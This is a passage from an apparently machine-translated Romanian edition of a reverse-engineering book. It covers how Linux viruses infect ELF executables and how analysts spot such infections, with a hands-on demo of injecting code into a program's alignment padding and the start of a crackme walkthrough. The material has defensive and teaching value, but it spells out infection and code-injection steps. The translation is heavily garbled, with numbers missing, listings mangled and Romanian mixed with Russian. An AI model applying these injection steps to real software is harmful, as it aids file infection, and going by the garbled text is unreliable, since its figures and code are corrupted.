generală arată astfel (implementareÎn fișierele de sicriu, acesta este realizatîntr -un mod similar): □ Virusul deschide fișierul și, numărarea rubricii sale, este convins că acesta este cu adevăratfișierul de format ELF □ Titlul tabelului secțiunilor (tabelul antetului secțiunii) se deplasează la o dimensiune egalăcu lungimea corpului virusului Pentru a face acest lucru, virusul crește conținutul câmpului E Shoff care ocupă octeți H - H Baytes Elf Head Rețineți titlul tabelelor de secțiune, precum și secțiunile în sine, contează doar pentru fișierele dedispunere, încărcătorul fișierelor executabile le ignoră, indiferent dacă sunt prezente în fișier sau nu □ Analizândrubrica tabelului de segmente (Tabelul antetului segmentului), virusul găsește segmentul, cel mai preferat pentruinfecție, adică segmentul, care indică punctul de intrare □ Lungimea segmentului găsit crește cu o dimensiune egală cudimensiunea corpului virusului Acest lucru se realizează prin corectarea sincronă a câmpurilor P FILEZ și P MEMZ □ Toatecelelalte segmente se schimbă, în timp ce câmpul P OFFSET al fiecăruia dintre ele crește pe lungimea corpuluivirusului □ Analizarea titlului tabelelor de secțiune (dacă este prezent doar în fișier), virusul găsește o secțiunecare este cea mai preferată pentru infecție (de regulă, secțiunea care se află în segmentul acestuia din urmă esteinfectată: aceasta elimină virusul din nevoia de a muta toate celelalte secțiuni în jos) □ Mărimea secțiunii infectate(câmpul Sh size) crește cu o dimensiune egală cu dimensiunea corpului virusului □ Toate secțiunile de coadă alesegmentului sunt deplasate în jos, în timp ce câmpul sh offset al fiecăruia dintre ele crește cu lungimea corpuluivirusului (dacă virusul este introdus în ultima secțiune de segment, acest lucru nu este necesar) □ Virusul sepregătește până la sfârșitul segmentului infectat, schimbând fizic conținutul restul fișierului în jos □ Pentru aintercepta controlul, virusul ajustează punctul de intrare la fișier (e entry) sau introduce în adevăratul punct alintrării JMP în corpul său Înainte de a continua discuția despre „urmele” caracteristice ale implementării virale, săvedem ce secțiuni în care segmentele sunt de obicei localizate Se dovedește că schema distribuției lor este departe de afi lipsită de ambiguitate și este posibilă o mare varietate de variații În unele cazuri, secțiunile de cod și date suntplasate în segmente separate, în altele - date disponibile numai pentru citire, se combină cu secțiunile de cod într -unsingur segment În consecință, ultima secțiune a segmentului de cod va fi diferită de fiecare dată GPAVA Demontațifișierele ELF pentru Linux și BSD Majoritatea fișierelor includ mai multe secțiuni de cod, iar aceste secțiuni suntlocalizate aproximativ așa cum se arată în lista : Listarea Locația secțiunilor de cod ale fișieruluitipic INIT conține codul de inițializare plt conține un ligament al subprogramelor Text conține codul principal alprogramului FINIT conține codul de finalizare a secțiunii prezența secțiunii Finit duce la faptul că secțiunea Textulîncetează să mai fie ultima secțiune a segmentului de cod de fișiere, așa cum se întâmplă cel mai adesea Astfel, înfuncție de strategia de distribuție a segmentului, ultima secțiune a fișierului este de obicei fie secțiunea finit, fie rodata Secțiunea finit în majoritatea cazurilor este o secțiune minusculă, a cărei infecție este puțin probabil sătreacă neobservată Codul localizat în secțiunea finit și interceptează direct firul programului de pe sine, pareoarecum ciudat, dacă nu - suspect (de obicei, controlul de pe finit este transmis indirect ca argument al funcțieiAtexit) Invazia va fi și mai vizibilă dacă secțiunea RODATA este ultima secțiune din segmentul infectat, deoarece codulmașinii cu dezvoltarea normală a evenimentelor nu se încadrează niciodată în date Nu există nicio invazie a primeisecțiuni a segmentului de cod (în ultima secțiune a segmentului care precede segmentul de cod), deoarece segmentul decod începe aproape întotdeauna cu secțiunea Init, cauzat din adâncurile codului de pornire și, ca de obicei, careconține câteva comenzi de mașină Virusul de aici nu va avea pur și simplu nicăieri să se piardă, iar prezența sa devineimediat vizibilă!Virusii mai avansați sunt introduși la sfârșitul secțiunii Text, schimbând restul conținutuluifișierului în jos Este mult mai dificil să recunoaștem o astfel de infecție, deoarece vizual structura fișierului parenetratată Cu toate acestea, există încă câteva indicii În primul rând, punctul de intrare original al marea majoritate afișierelor este situat la începutul secțiunii de cod și nu la sfârșitul acesteia În al doilea rând, fișierul infectatare un cod de pornire atipic Și, în al treilea rând, nu toți virușii au grijă de alinierea segmentelor(secțiuni) Ultimul caz ar trebui să fie luat în considerare în special Încărcătorul de sistem care nu știe nimic despreexistența secțiunilor, gradul de egalizare este indiferent Cu toate acestea, în toate fișierele executabile normale,secțiunile sunt aliniate în detaliu de valoarea indicată în câmpul sh addralign Când este infectat cu un virus, acestadin urmă este departe de a fi întotdeauna atât de îngrijit, iar unele secțiuni se pot găsi brusc la adreseneașteptate Acest lucru nu va încălca performanța programului, dar faptul invaziei virusului va demasca imediat Segmente De asemenea, nu este necesar să se egalizeze (dacă este necesar, încărcătorul de sistem o va face în sine), cu toateacestea, eticheta de programare prescrie să alinieze secțiunile, chiar dacă câmpul p -r -align este zero (adică, nu estenecesară alinierea) Toate segmentele de nivel normal de niveluri cu dimensiunea a cel puțin un multiplu de de octeți,deși acest lucru nu se întâmplă întotdeauna Cu toate acestea, dacă segmentele care urmează segmentul de cod sunt mainivelate de o sumă mai mică, ar trebui să aruncați o privire mai atentă la un astfel de fișier Un alt punct important:atunci când virusul este introdus la începutul segmentului de cod, acesta poate crea propriul său segment precedent Șiatunci virusul se confruntă brusc cu o problemă destul de interesantă El nu poate muta segmentul de cod în jos, deoarecede obicei începe cu o deplasare zero în fișier, blocând segmentele anterioare Programul infectat poate funcționa, daraspectul segmentelor devine prea neobișnuit pentru a nu -l observa Alinierea funcțiilor în secțiuni poate fi consideratăîn general „dovezi materiale” Frecvența nivelizării funcțiilor nu este nicăieri să fie declarată și fiecare programatoreste înclinat să alinieze funcțiile în felul său Unii folosesc alinierea pentru adrese, mai multe Partea IV Metode avansate de dizassembing H, alții - H, H sau chiar H!Esteaproape imposibil să se stabilească gradul de aliniere fără un dizassembler de înaltă calitate Este necesar să scriețiadresele de pornire ale tuturor funcțiilor și să găsiți cel mai mare divizor, care sunt toate împărțite fără urmă Prinadăugarea la sfârșitul segmentului de cod, virusul va fi confundat cu siguranță cu alinierea funcției funcției (dacă îngeneral are grijă să creeze o funcție în acest loc!), Și apoi alinierea lui Prologul va fi diferit de gradul deegalizare acceptat de toate celelalte funcții Un exemplu clasic de virus, care este introdus în fișierul extensieisegmentului de cod, este virusul Linux Vit Nota este curioasă că diverși autori descriu în moduri diferitestrategiile utilizate de virus pentru infecție Deci, în Enciclopedia virală Evgeny Kaspersky (http://www viruslist com/Viruslist html? Id = ), se spune că virusul VIT este înregistrat la începutul secțiunii de cod a fișieruluiinfectat, în timp ce acesta acesta își plasează corpul la sfârșitul segmentului de fișiere de cod de cod(http://www mcafee com/uszlocalcontent/white papers/threat center/wp mwanvoers vb conf pdf) Un fragment din fișierulELF infectat cu virusul VIT este prezentat în Fig Câmpurile modificate de virus sunt evidențiate Orez Unfragment dintr -un fișier infectat cu Linux ) Virus Mulți viruși și, în special, virusul lin/obsidian, ei se dauafară că atunci când introduc în mijlocul fișierului, ei uită să modifice rubrica secțiunilor Tabel (sau modificați -lincorect) Așa cum am menționat anterior, în procesul de descărcare a fișierelor executabile în memorie, System Loadercitește informații despre segmente și proiectează conținutul lor în ansamblu Structura internă a segmentelor nu îlinteresează deloc Chiar dacă titlul tabelului de secțiune este absent sau completat incorect, programul lansat pentruexecuție va funcționa corect Cu toate acestea, în ciuda acestui fapt, în marea majoritate a fișierelor executabile,titlul tabelului de secțiune este încă prezent, iar încercarea de a-l elimina se încheie foarte deplorabil-popularuldepanare GDB și o serie de alte utilități pentru lucrul cu fișierele ELF refuză să recunoască Un astfel de fișier „allor” Atunci când infectează fișierul executabil cu un virus, care predă în mod incorect rubrica tabelului de secțiuni,comportamentul de depanare devine imprevizibil, demascând astfel faptul de invazie virală Enumerăm unele dintre cele maicaracteristice semne de infecție a fișierelor executabile Rețineți că virușii care sunt introduși în fișierele dedispunere prelucrează îndreptarea tabelului de secțiuni destul de corect, altfel fișierele infectate vor refuza imediatsă funcționeze, iar distribuția virusului se va opri imediat: □ E SHOFF Field indică „prin„ adevăratul Titlul tabeluluide secțiune (pe măsură ce virusul se comportă în sine/obsidian) sau are o valoare zero cu o rubrică non -elaborare atabelului de secțiune (după cum se comportă virusul linux garnelis) □ Câmpul E Shof F nu este necesar, dar nu un singurtitlu al tabelului de secțiune din fișier GPAVA Demontarea fișierelor ELF pentru Linux și BSD □ Tabelul derubrică nu este conținut la sfârșitul fișierului, există mai multe aceste rubrici sau rubrica secțiunii secțiunilorintră în limitele deținerii unuia dintre unul dintre segmentele □ Suma lungimilor tuturor secțiunilor unui segment nucorespunde lungimii sale complete □ Codul programului este situat într -o zonă care nu aparține unei singuresecțiuni Trebuie spus că studiul fișierelor cu o rubrică distorsionată a tabelului de secțiuni este o problemă destul dedificilă DizAssemblers și Debuggkers fie atârnă sau afișează acest lucru Fișierul este incorect sau nu îl încărcați deloc Prin urmare, dacă intenționați să studiați fișierele infectate nu o zisau două, cel mai bine va fi să vă scrieți propria utilitate pentru analiza lor Schimbarea secțiunii de cod în jos estedificil de explicat motivele pentru care virușii sunt introduși în începutul secțiunii de cod (segment) a fișieruluiinfectat sau își creează propria secțiune (segment propriu), având această secțiune (segment) în față Această tehnicănu oferă avantaje cu privire la înregistrarea corpului viral la sfârșitul secțiunii de cod (segment) și, în plus, estemult mai dificil de realizat Cu toate acestea, există astfel de viruși Acestea vor fi discutate în detaliu în aceastăsecțiune Cel mai înalt nivel de secret este atins la introducerea la începutul secțiunii Text, care se realizeazăaproape la fel ca implementarea la sfârșit Singura diferență este că, pentru a menține performanța fișierului infectat,virusul ajustează câmpurile SH ADDR și P VADDR, reducându -le după dimensiunea corpului său și fără să uite denecesitatea alinierii (dacă alinierea este cu adevărat necesară) Primul câmp stabilește adresa de pornire virtualăpentru proiecția secțiunii Text, a doua este adresa de pornire virtuală a DPI a proiecției segmentului de cod Ca urmarea acestei fraude, virusul se dovedește a fi chiar la începutul secțiunii de cod și se simte destul de încrezător,deoarece în prezența codului de pornire pare indistinguibil de programul „normal” (Fig ) Cu toate acestea,performanța fișierului infectat nu mai este garantată, iar comportamentul său riscă să devină complet imprevizibile,deoarece adresele virtuale ale tuturor secțiunilor anterioare vor fi distorsionate Dacă, la întocmire a programului,compusul a avut grijă să creeze o secțiune de elemente mutate, atunci virusul (teoretic) poate utiliza aceste informațiipentru a aduce secțiunile anterioare la normal Cu toate acestea, fișierele executabile în marea lor majoritate suntconcepute pentru a funcționa în adrese fizice strict definite și, prin urmare, imperisabile Dar chiar și în prezențaelementelor mutate, virusul nu va putea urmări toate cazurile de adresare relativă Aproape întotdeauna nu existălegături relative între secțiunea de cod și secțiunea de date și, prin urmare, cu invazia virusului la sfârșitulsecțiunii de cod, capacitatea de lucru a FIEP în majoritatea cazurilor nu este încălcată Cu toate acestea, în interiorulsegmentului de cod, cazurile de adresare relativă între secțiuni sunt mai degrabă o regulă decât o raritate Aruncați oprivire la listarea Dizassmistită a utilității Ping, împrumutată de la Linux Red Hat (listarea ) Comanda deapel situată în secțiune MIT și subprograma cauzată de aceasta în secțiune Text, partajează exact H - I H ==I BH BYTE, iar acest număr apare în codul mașinii (dacă continuați să continuați să vă îndoiați, uitați -vă la setul dereferință de instrucțiuni Inter: Echipa E H este o echipă de apel relativ) Listarea Un fragment din utilitateaPing folosind, ca multe alte programe, legături relative între secțiunile segmentului de cod init: init procaproape;Code Xref: Start+ IP INIT: E B APELURI Sub INIT: C RETN INIT: INIT ENDP Text: Sub Proc Cod xref: init viteză Partea IV Metode avansate de dizassembingFig Schema standard de infecție a fișierului executabil prin extinderea secțiunii sale de cod nu este surprinzătorfaptul că, după infecție, fișierul va înceta să funcționeze (sau va funcționa incorect)!Dar, dacă s-a întâmplat totuși,încărcați fișierul în depanare/dizassembler și căutați dacă apelurile relative ale primelor secțiuni de cod sunt înconcordanță cu punctul dvs Recunoașteți cu ușurință faptul infecției fără a fi chiar un specialist în domeniulinversării În această lume, nimic nu este dat în zadar!Pentru secretul invaziei virale, acesta din urmă trebuie săplătească distrugerea celor mai multe fișiere infectate Virusii mai corecți își au corpul la începutul segmentului decod - în secțiunea init Performanța fișierelor infectate nu este încălcată, dar prezența virusului devine ușor dedetectat, deoarece secțiunea INIT este rar mare și chiar un mic amestec de cod străin provoacă imediat suspiciune Uniiviruși (de exemplu, virusul linux nuxbee) se scrie în partea de sus a segmentului de cod al fișierului infectat, mutândpartea ștersă la sfârșitul secțiunii de cod (sau, chiar mai ușor, la sfârșitul ultimului segment de fișiere )După ce aprimit conducerea și a finalizat toate lucrările „pe gospodărie”, virusul aruncă o bucată din corpul său în stivă șirestabilește conținutul inițial al segmentului de cod Având în vedere că modificarea segmentului de cod este interzis înmod implicit și nu este un motiv pentru a permite virusul său (în acest caz, faptul că infecția este foarte ușor dedetectat), virusul trebuie să recurgă la Manipulări cu nivel scăzut cu atribute ale paginilor de memorie, provocând o funcție mprotect, practic nu se regăseșteîn aplicații „oneste” O altă caracteristică caracteristică: în locul în care se termină virusul și începe zonaneregrobată a corpului inițial al programului, se formează un defect particular Cel mai probabil, chiar și sigur, limitasecțiunii celor două medii va trece în mijlocul funcției programului inițial, dacă nu a disipat încă comandamașinii Dizassembler va arăta o anumită cantitate de gunoi și coada unei funcții cu un prolog absent Crearea proprieisecțiuni este cea mai corectă, deși cea mai puțin secretă, metoda de implementare în fișier este să vă creați propriasecțiune (segment), sau chiar două secțiuni - pentru cod și, respectiv, pentru date (lista ) Puteți plasa o astfelde secțiune oriunde Deși la începutul fișierului, cel puțin la sfârșit (opțiunea de a introduce în segment cu alunecareasecțiunilor vecine pe care le -am luat deja mai devreme) Nume Start End Alinign Base туре Clasa ES SS DS FS GS Init Para Cod de Publ y ffff ffff ffff ffff plt B DWORD DWORD PUBLY Y FFFFFFFFF FFFF FFFF Publ FFFF FFFF FFFF FFFF Гпава Дизассемблирование ELF-файлов под Linux и BSD -fini В В para publ CODE Y FFFF FFFF FFFF FFFF rodata B B byte publ CONST Y FFFFFFFF FFFF FFFF •data C A dword Publ Data Y FFFF FFFF FFFF FFFF • CTORS A A DWORD DATE PUBLICE Y FFFF FFFF FFFF FFFF • DTORS A A DWORD PUBLICA Y FFFF FFFF FFFFFFFF FFFF • BSS B CC QWORD A PUBL BSS Y FFFF FFFFFFFFFFF ENSTENȚIE A El a dus la moartea lui Înformatele ulterioare, această restricție a fost depășită Deci, în fișierele ELF, lungimea antetului este stocată încâmpul cu doi octeți E EHSIZE, care a ocupat H și de octeți, numărând de la începutul fișierului Prin creștereatitlului fișierului infectat cu o dimensiune egală cu lungimea corpului său și schimbarea restul fișierului în jos,virusul va putea să se copieze fără durere în spațiul format între capătul antetului real și Începutul tabeluluisegmentelor (tabelul antetului programului) Nici măcar nu trebuie să crească lungimea segmentului de cod, deoarece înmajoritatea cazurilor începe de la primii octeți ai fișierului Singurul lucru care va fi obligat să facă este virusuleste să mutați câmpurile P OFFSET ale tuturor segmentelor la dimensiunea corespunzătoare Segmentul care începe cudeplasarea zero nu trebuie să fie mutat nicăieri, altfel virusul nu va fi proiectat în memorie Cert este că deplasărilesegmentelor din fișier sunt numărate de la începutul fișierului, dar nu de la sfârșitul rubricii, care este ilogic șiincorect ideologic, dar simplifică programarea Câmpul E PHOF F, care setează deplasarea tabelului antetului programului,ar trebui, de asemenea, ajustat O operațiune similară ar trebui să fie făcută cu deplasări de secțiuni, altfeldepanarea/ dizassamblarea fișierului infectat va deveni imposibilă, deși un astfel de fișier va fi pornit normal Virusiiexistenți uită să ajusteze conținutul câmpurilor Sh offset, care se dau Cu toate acestea, trebuie să fiți pregătițipentru faptul că în următoarele generații ale virusului acest dezavantaj va fi eliminat Cu toate acestea, în orice caz,această metodă de infecție este prea vizibilă În programele normale, codul executabil nu se încadrează niciodată înrubrica ELF, iar prezența sa acolo indică elocvent infecție virală Descărcați fișierul studiat în orice editor Hex (deexemplu Hiew) și analizați valoarea câmpului E EHSIZE Titlul standard corespunzător versiunilor curente ale fișieruluiELF de pe platforma X are o lungime egală cu de octeți Doar nu încercați să descărcați fișierul infectat înDizassembler Este inutil Cei mai mulți dintre ei, inclusiv IDA Pro, vor refuza să renunțe la zona de titlu, iarcercetătorul nu știe nimic despre faptul infecției!În fig prezintă un fragment dintr -un fișier infectat cuvirusul unix inheader Acordați atenție lungimii titlului ELF evidențiat de cadru Este evidențiat corpul viral careîncepe cu ore Punctul de intrare este, de asemenea, direcționat aici (în acest caz, este ) Orez Unfragment dintr -un fișier de gunoi hexadecimal infectat cu virusul unix inheader , care este introdus în rubrica ELF Partea IV Metode avansate DizAssmit Ca opțiune, virusul se poate îmbrăca între capătul capului ELF și începutultabelului segmentelor (tabelul antetului Piogram) Infecția are loc în același mod ca și cazul anterior, dar lungimeacapului de elf rămâne neschimbată Virusul se află în zona „Amurg” a memoriei, aparținând formal unuia dintre segmente, dar de facto a considerat „noe” și, prin urmare, ignorate de mulți debuggeri și dizassemblers Dacă numaivirusul nu reinstalați punctul de intrare, Dizassembler nu va aduce nici măcar mesaje și avertismente cu aceastăocazie Prin urmare, oricât de minunat este IDA RGO Dizassembler și este încă necesar să vizualizați fișierele studiateîn Hiew!Având în vedere că nu toți experții în securitate ghicesc despre acest lucru, această metodă de infecție riscăsă devină foarte promițătoare Un exemplu practic de introducere a unui cod extraterestru în fișierul ELF pentruexperimentele de implementare va necesita un fișier „live”, care utilizând un compilator și un editor de text poate firealizat independent De exemplu, faceți clic pe Combinația de tastatură + în Midnight Commander și tastațiprogramul, al cărui conținut este afișat în lista Apoi, salvați fișierul apăsând tasta și introducând numelefișierului și compilați programul folosind GCC cu tincturi implicite (DSS Name-File , Listarea Programdemonstrativ, despre care vom introduce codul străin #include mail () {printf ("Lordi - cel mai bun grup dinlume \ n" \ "(www Lordi org) \ nrnoNsters, Bondage și Sadoge -Maso \ n ");} Încărcăm fișierul format într-un editorHex (# /HT- -Linux-I -fișier), apoi faceți clic pe (modul) și alegem opțiunea ELF/imagine Editorul va intraîn modul de afișare al imaginii fișierului executabil, transferându -ne automat în vecinătatea punctului de intraremarcat cu marcajul de intrare Dacă acest lucru nu se întâmplă, faceți clic pe (goto) și introduceți linia deintrare Ecranul ar trebui să arate aproximativ așa cum se arată în Fig Să schimbăm doar primele două echipe pentruWarm -ups: Xor EBP, EBP/POP ESI pe pop ESI/XOR EBP, EBP Vom aduce cursorul la prima comandă a mașinii (este situată la C H), faceți clic pe Combinația de tastatură + (asambla) și vom intra în comanda Pop ESI Editorul vaoferi mai multe opțiuni de asamblare pentru alegerea noastră: EH și *TI SB Alegeți EH ca cel mai scurt ( FH C H purși simplu nu se încadrează în locul desemnat!), Apoi asamblăm doar comanda XOR EBP, EBP Editorul selectează octețiischimbați în lumina de fundal (vezi Fig ), care este clar și foarte frumos, dar atunci când este apăsat pe (salvare), acest lucru de fundal dispare, confirmând că toate corecțiile sunt păstrate cu succes Nu există câmpuri alesumei de control în postul de elf și, prin urmare, nu este necesar să aveți grijă de relatarea sa Cantitatea de controlLinux a fișierului nu crede că este un avantaj grav față de judecătorul Windows pentru tine: atât Linux, cât și văduveleacceptă mecanismul de încărcare întârziat la cerere Paginile imaginii sunt proiectate în memorie și numai atunci când seproduce apelul lor, ca urmare a căreia imediat după lansare, fișierul este deja gata să funcționeze Toate paginile lipsăsunt construite mai târziu (sau deloc încărcate) De exemplu, partea programului responsabilă de imprimare nu va fiîncărcată deloc dacă utilizatorul nu a ales niciodată elementul de meniu Pring în procesul cu programul Procesul deîncărcare, așa cum a fost, este „înfipt” în timp, nu este nervos cu niciun ceas de nisip pe care Windows atât de adorăsă -l demonstreze Dar!Într -adevăr, atunci când se calculează suma de control, apare un apel inevitabil la toatepaginile și toate acestea sunt încărcate în memorie, chiar dacă nu este nevoie Se dovedește că avem două mecanisme-unaoptimizează sarcina, celălalt „pesimisi-is”, consumând întregul câștig Unde este logica?!Capitolul Demontațifișierele ELF pentru Linux și BSD Fig Fișier executabil deschis în editorul Hex NT Fig Rezultatulfișierului modificat după rearanjarea unei perechi de comenzi Partea IV Metode avansate de dizassembing, dardezvoltatorii Linux au transferat cantitatea de control pe dispozitivele de intrare/ieșire care o numără cuadevărat Desigur, acest lucru nu asigură distorsiunea În special, hard disk -urile controlează doar defectele fizice,dar nu acordați atenție distorsiunilor logice (precum un virus) Cu toate acestea, nu există încă un sens special în sumade control stocată direct în fișierul în sine Dacă virusul poate modifica fișierul, acesta modifică suma decontrol Potrivit științei, sumele de control trebuie să fie stocate într -un „stocare securizată”, iar un sistem defișiere sau auditori antivirus ar trebui să fie efectuați prin calculul lor Nici unul, nici celălalt în lumea Linuxuluinu sunt observate Aceasta este, de fapt, în lumea Linux, există sisteme de fișiere protejate și revizori antivirus Dar,în practică, doar câțiva utilizatori le instalează Singura problemă este protectoarele și pachetele de fișiereexecutabile care își controlează propria integritate În fiecare an sunt din ce în ce mai mulți UPX, TREAD din Shiva,etc în fișiere, ambalate sau protejate de astfel Este mai bine să nu fie introdus prin mijloace, cel puțin la început Dar am fost distrași Lăsăm editorul Hex, făcândclic pe și pornind fișierul zdrobit Începe, confirmându -și performanța Deci, modificarea a avut succes (Fig ) Și acum va avea grijă de lucruri mai serioase, încercând să introducă un cod real în program, ceea ce face cevautil Întrebarea apare imediat: unde vom fi introduși?Nu există spațiu liber între segmente, între secțiuni Puteți(teoretic) să extindeți ultimul segment și să implementați aici Cu toate acestea, în primul rând, va fi prea vizibil și,în al doilea rând, prea înfricoșător și obositor Dar totul nu este atât de rău pe cât pare!În mod implicit, GCC aliniazăadresele de pornire ale funcțiilor de -a lungul frontierei IOH, ceea ce înseamnă că chiar și fișierul nostrudemonstrativ conține suficient spațiu liber: în medie H/ H = H octet pentru fiecare funcție, inclusiv celeoficiale Vă puteți ascunde aici și mamutul, cu excepția cazului în care, desigur, îl dezmembrați Aici, vedeți singuri(listarea ) Listarea Lanțul echipelor TSOR a rămas de către compilatorul „sfârșitul funcției principalepentru alinierea„ ”> * - „„ ■ ”„ • ”•” „• • • •„ „„ ”> rf m Push Push Push Push Push Push Push Apel HLT NOP EAX ESP EDX , LIBC CSU F INI IBC CSU INIT ECX ESI Main Wrapper A п ь п пp Unde putem face tot ce amplanificat, să facem aceste comenzi și să ne întoarcem?În primul rând, este necesar să pregătim codul pe care îl vomimplementa Pentru simplitate, vom face un scurt salut pe ecran În limbajul de asamblare, acest lucru sună aproximativașa cum se arată în lista , Listingzi Original MOV EAX, MOV EBX,] MOV EE, OFFSEET BEQIN MSG MOV EDX, OFFSETEND MSG INT H POP ESI XOR EBX, EBP JMP C H Sistemul de apeluri de apeluri de apel Write Subiect Simbolul ieșiriimesajului afișat pe ecranul comenzilor salvate reveniți la programul de ego nu este cea mai bună opțiune și poate fiexcelent optimizat dacă îl rescrieți așa cum se arată în lista Listarea Opțiune optimizată Programe prezentate în listarea Hog EAX, EAH Adăugare AL, Xor EBX, EBX INC EBX MOV ECX, OFFSET SEGI MSG MOV EDX,ECX ADD EDX, SIZEOF (MSG) INT H POP ESI XOR EBP, EBP JMP C Acum Editor Echic, vom găsi și scrie adresele depornire ale tuturor comenzilor NOP potrivite pentru implementare Ce lanțuri sunt potrivite pentru implementare?Dacă celedouă lanțuri vecine sunt amplasate la îndemâna unei tranziții scurte (într -o evaluare brută - în termen de o sută deocteți), atunci cele trei comenzi NOP vor fi suficiente ( octeți la echipa de tranziție, una pentru orice comandă unică-byte de cod util, de exemplu, INC EBX sau POP ESI) În caz contrar, trebuie să avem un lanț de cel puțin șaseinstrucțiuni NOP - cinci la comanda de salt aproape și una - pe o comandă utilă Pentru exemplul luat în considerare,lista adreselor inițiale ale instrucțiunilor NOP adecvate pentru implementare arată așa cum se arată în lista GPAVA Demontarea fișierelor ELF pentru Linux și BSD „Listarea Lista de start -ups a instrucțiunilorNOP potrivite pentru implementare și lungimea lor '' h bytes A H BYTES H octeți în total,obținem de octeți potriviți pentru implementare Pentru programul nostru demonstrativ, acest lucru este mai mult decâtsuficient Începem să completăm instrucțiunile NOP cu un cod util La prima încercare, obținem rezultatul arătat în lista C HOG EAX, EAX Adăugare al, A E JMP A H F Pa, în timpce ultima instrucțiune a unui NOP a fost neutilizată, dar nu funcționează diferit Echipa Xor Eugene, Evos ocupă doiocteți și, prin urmare, nu se potrivește aici Dar dacă rearanjați comenzile în locuri?Transfer Adăugați AL, laurmătorul lanț NOP și, în schimb, introduceți Xor Eugene, ESH/ INC ESSH (listarea ) Ch ',……………………………………………………………………………………………………………………………………… reușind > • , •; ' L, IS! TIVG ^' 'VRU Vychiki Inslra CCI ZSO DB A B E Hog Hog PPJMP EAH, EBX, EBX EBX A H În acest caz poate fi completat așa cum se arată în lista Listarea Opțiunepreliminară pentru completarea celui de -al doilea lanț de instrucțiuni NOP A Adăugare AL, A B ?????MOV ECX, Offset Begin MSG A MOV EDX, ECX A E ° B JMP H În al treilea,ultimul, lanțul instrucțiunilor NOP, restul codului nu mai conține un singur octet!Ei bine, să încercăm să ne strângemcodul puțin mai mult De exemplu, în loc de o pereche de instrucțiuni MOV EDX, ECX/ADD EDX, SIZEOF (MSG), care ocupă octeți, puteți utiliza Lea EDX, [ECX+Sizeof (MSG)] Atunci totul minte!Ei bine, mesajul în sine poate fi plasat însegmentul de date întrucât nu există foarte mult spațiu liber acolo, ne limităm la Hello Line Ultimul zero lasfârșit nu este necesar, deoarece apelul sistemului de scriere afișează exact la fel de multe caractere pe care le esteordonat să -l aducă și nu acordă atenție niciunei secvențe de control Dacă totul s -a făcut corect (ceea ce este puținprobabil, încă de la prima dată când greșelile fac totul), fișierul nostru va afișa triumfător linia Hello și urmată delinia pe care o afișează programul studiat în sine Astfel, ecranul va arăta așa cum se arată în Fig (Hello Line,care este afișat de codul implementat, este introdus de Oval pentru claritate) Am examinat cel mai simplu caz și amescortat cu el destul de mult timp Cât timp va dura infecția unui program cu mărturisire completă?Restul vietiitale?Desigur că nu!Multă vreme este doar cu obiceiul, atunci abilitatea este produsă și totul merge pe pilotautomat!Principalul lucru este să nu vă fie frică de dificultăți și să vă antrenați constant, să vă onorațiabilitatea! Partea IV Metode avansate de dizassembing Fig Rezultatul programului după introducereacaracteristicilor DizAssembing pentru Linux folosind exemplul de DizAssembing pentru Linux pentru Linux are propriilesale specifice și subtilități care nu sunt iluminate în literatura de specialitate accesibilă și rămânând sub regulaîntunericului Între timp, dezvoltatorii de mecanisme de protecție nu dorm, iar produsele lor devin mai puternice zi dezi Pentru a câștiga în această luptă, este necesar nu numai să stăpânești munca cu Dizassembler, ci și să dobândeștiabilitățile unei lucrări eficiente cu ea Principala caracteristică a dizassempului pentru Linux este absența aproapecompletă a DizAssemblers demn (cu excepția IDA Pro, desigur) și a altor instrumente Prin urmare, chiar și o simplăprotecție pune un hacker începător într -un punct mort De fapt, nu există nimic aici Zburând și copleșitor, este necesar doar să stăpânești metodele eficiente de DizAssMitting sub Linux Această secțiune vademonstra tehnica unei dizassembing -uri eficiente pentru Linux folosind exemplul micuțului puzzle al lui Yanisto, carepoate fi descărcat de pe minunatul site german http://www crackmes de/yanisto/tiny crackme/ Acest site conține oîntreagă colecție de puzzle -uri de hacker și sarcini de diferite niveluri de complexitate și apar noi informații despreele În special, descrierea exemplului nostru arată așa cum se arată în lista Gpava Demontarea fișierelor ELFpentru Linux și BSD I Listing Zi gg Speed ​​^^^ Dysani^Geloomo-OreUapizAT'z Tiny Crackme, dat pe site *^ ^T G/Ti zi> a?L *'r'g *** "u * TNP RWWWW> CRA + , iar în caseta de dialog care apare (Fig ),introduceți scriptul prezentat în lista ■ y^l^aparent^locuind automat a, x;// declarați variabile (tip automat)pentru (a = x v; a + va duce la implementarea sa și va descifra întregul cod Apropo,dezvoltatorul acestui puzzle a făcut o greșeală non -critică și a descifrat doi octeți mai mult decât a fost stabilit,ca urmare, a diluat începutul decodificatorului (listarea ) Cu toate acestea, în acest caz, acest lucru estenesemnificativ, deoarece până la acel moment începutul decodificatorului va funcționa deja ca prima etapă a rachetei șinu va împiedica implementarea normală a programului Escilând Procedura de decriptare care se devorează sarcina: F Sub f Încărcare: F JIRP LOAD: F în Proc aproape de PTR LH AL, DX;Cod xref: Start: LOC„ RP;Echipa diluată;Echipa diluată Acum, după ce întregul cod este descifrat, putem continua analiza sa Neîntoarcem la locul apelului la Sub f , situat la H Vedem o prostie completă (listarea ) „Listarea Aspectul Dizassembler după încărcarea de despachetare: Încărcare de apel: V B MOV SAROAD: C E SAHF Sarcina: E și LOAD: F Adăugați sub f Eax, eh [EABX+ F;procedura dedecodare;Trimiteți numărul eh în EAC;\;+ - Codul de gunoi fără sens arată ca o prostie completă Ce altul SAHF și șiadăugați?Dar asta este!Aruncând o privire mai atentă asupra opțiunilor | Reprezentarea textului | Numărul de octețiOpcode | ), descoperim că instrucțiunile Moscova EAX, eh corespund codului unic -byte B H (în orice caz, IDA Pro neasigură în acest sens) , care nu poate fi!De fapt, aceasta este doar ciudățenia IDA Pro Dazassembler, care nu aactualizat scorul Dizassembler după decriptare Conducem cursorul la linia bh și facem clic pe pentru a -lconverti într -o formă nedeterminată Același lucru trebuie să se facă și cu tabloul de octeți începând cu o linie H (vezi Lista ) Dar asta nu este tot!La urma urmei, după decriptare, acest tablou a devenit parte aprocedurii noastre, iar Dizassembler a întrerupt greșit funcția la adresa H, introducând instrucțiunile ENDPacolo Pentru a restabili status quo -ul, este necesar să se potrivească cursorul până la sfârșitul tabloului și săapăsați (Editați | Funcții | Set funcție END) După aceea, puteți reveni la începutul liniei bh și apăsați pentru a transforma octeții vagi în cod Drept urmare, programul Dizassemble va arăta așa cum se arată în lista Listarea Дизассемблированный листинг после расшифровки скриптом (см листинг ) LOAD: ВLOAD: В LOAD: LOAD: LOAD: LOAD: Е LOAD: LOAD: LOAD: DLOAD: LOAD: LOAD: ІОС В: ;Date xref: sub f +lo mov eax, eh;Începutul nouluiciftlop mov ebx, f h;Lungimea cifrului în 